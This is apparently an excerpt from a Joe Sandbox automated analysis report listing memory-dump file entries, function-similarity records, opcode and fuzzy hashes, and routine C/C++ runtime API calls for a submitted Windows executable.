                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1155477157-0
                                                                                                                                                                        • Opcode ID: 1ea37b342092893f6686898047e5bc51610504fcf042aded55a49cd361582d6c
                                                                                                                                                                        • Instruction ID: 1a4f5eb19cff8422ab5c2a437e075315e2cf53c45f79a639546795ef23a49ac9
                                                                                                                                                                        • Opcode Fuzzy Hash: 1ea37b342092893f6686898047e5bc51610504fcf042aded55a49cd361582d6c
                                                                                                                                                                        • Instruction Fuzzy Hash: 1F31A762B05781A1EB14AB129D4027AA297FB55BB4FB44B30D93D077D1DF3CE892C711
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpy$Concurrency::cancel_current_task
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 326894585-0
                                                                                                                                                                        • Opcode ID: 05fadf9653c490a5e2dba9b0ebca9f3dbc00753941b367a68c662daf98e188de
                                                                                                                                                                        • Instruction ID: ffedcabc75370f26bd80906d5fe5208e47c8f2ff062d3edc726df1a343d7ea51
                                                                                                                                                                        • Opcode Fuzzy Hash: 05fadf9653c490a5e2dba9b0ebca9f3dbc00753941b367a68c662daf98e188de
                                                                                                                                                                        • Instruction Fuzzy Hash: A22129A2F097C665EA54BB11FD003BA9152BF047A4FA40A31DE6D067C2DE3CE882C710
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharErrorLastMultiWide
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 203985260-0
                                                                                                                                                                        • Opcode ID: f63fd69c30a4689ddbf493c0d1f5714778cbe43d56e2c88d7a975bf0ea5e2649
                                                                                                                                                                        • Instruction ID: 818085201ba2ddf22c2483fbbcd82caf81509aab5236b70015411e1e925964d6
                                                                                                                                                                        • Opcode Fuzzy Hash: f63fd69c30a4689ddbf493c0d1f5714778cbe43d56e2c88d7a975bf0ea5e2649
                                                                                                                                                                        • Instruction Fuzzy Hash: 9F214772A18B8187E3209F11E84432EBAB6F789B84F640138DB8853B54CF3CD805CB00
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __acrt_iob_func__stdio_common_vfprintffclosefflushfree
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2759974054-0
                                                                                                                                                                        • Opcode ID: 4b8cbb2eab82408cb72d5d77ddd86e032ff70fca4d004e22786f2319a7a853c9
                                                                                                                                                                        • Instruction ID: 4e6a606ef87e569c40a82ced2e5b67783e99f3b63543d088c0db73c5e7869021
                                                                                                                                                                        • Opcode Fuzzy Hash: 4b8cbb2eab82408cb72d5d77ddd86e032ff70fca4d004e22786f2319a7a853c9
                                                                                                                                                                        • Instruction Fuzzy Hash: 8E21BB75608AC291EB50BF90ED456BAB3A1FF40B80FA90136CE0D8B254DF2DAC85D730
                                                                                                                                                                        APIs
                                                                                                                                                                        • __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF786616BC5
                                                                                                                                                                          • Part of subcall function 00007FF78662DA28: MultiByteToWideChar.KERNEL32 ref: 00007FF78662DA44
                                                                                                                                                                          • Part of subcall function 00007FF78662DA28: GetLastError.KERNEL32 ref: 00007FF78662DA52
                                                                                                                                                                        • __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF786616C71
                                                                                                                                                                          • Part of subcall function 00007FF78662B410: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00000004,?,00007FF786617151), ref: 00007FF78662B513
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __std_fs_convert_narrow_to_wide$ByteCharErrorLastMultiWidememcpy
                                                                                                                                                                        • String ID: Unknown exception
                                                                                                                                                                        • API String ID: 3269794198-410509341
                                                                                                                                                                        • Opcode ID: 08ed18e22671eca5a9cc59e8032db38cd828cdea71cf05f907e4e316fac53c73
                                                                                                                                                                        • Instruction ID: 2864e64d85d638483b811e4ba3b97052d4a227d8fa0be82169cbf0b40421b731
                                                                                                                                                                        • Opcode Fuzzy Hash: 08ed18e22671eca5a9cc59e8032db38cd828cdea71cf05f907e4e316fac53c73
                                                                                                                                                                        • Instruction Fuzzy Hash: 403126A6B187C592EF14AF62E900A6EA296FB44FC8F645035EE4D47744DF3CE851CB40
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Xlength_error@std@@__std_exception_copy
                                                                                                                                                                        • String ID: string too long
                                                                                                                                                                        • API String ID: 127952674-2556327735
                                                                                                                                                                        • Opcode ID: 3c2f2a00601e6976b58f44fe5c75412df300512293b6c190c81cf762664ab9ad
                                                                                                                                                                        • Instruction ID: 27f2fd591eea5ffc343bdcde633352868c19685fbff9a2ff0dd47542a82c2f7d
                                                                                                                                                                        • Opcode Fuzzy Hash: 3c2f2a00601e6976b58f44fe5c75412df300512293b6c190c81cf762664ab9ad
                                                                                                                                                                        • Instruction Fuzzy Hash: F8E03061B15B85A1DB05AF61ED900A5B366FF18B14F949131C94C46324EF2CA9EDC710
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: freemalloc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3061335427-0
                                                                                                                                                                        • Opcode ID: c093f19e11287bf58d1a03016f4ffd6d2ee3e786ed9673e3c65c96f13d03bbb8
                                                                                                                                                                        • Instruction ID: ba96afbd95324ab0dfe38f0788c03f5c07ae3dfdc22dd1b923b0948c62342c67
                                                                                                                                                                        • Opcode Fuzzy Hash: c093f19e11287bf58d1a03016f4ffd6d2ee3e786ed9673e3c65c96f13d03bbb8
                                                                                                                                                                        • Instruction Fuzzy Hash: BFB1D722E14F8596E712EB35D44427AF7A4FF99B84F149332FF4552664DB38E882CB10
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpy$freemalloc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3313557100-0
                                                                                                                                                                        • Opcode ID: d8f929feb02f49bec9ceb830092e7ed25e04814ece36a7521f167546b7acc7a9
                                                                                                                                                                        • Instruction ID: 459397bc9caecc0f7d3b474e1121a543a4d05d12513ee7ddd967a47ce0ae3535
                                                                                                                                                                        • Opcode Fuzzy Hash: d8f929feb02f49bec9ceb830092e7ed25e04814ece36a7521f167546b7acc7a9
                                                                                                                                                                        • Instruction Fuzzy Hash: 0131C072B05AC1A6FE049F46E9441AAA361FB88B80B988436DF5D87750DF3CE891C740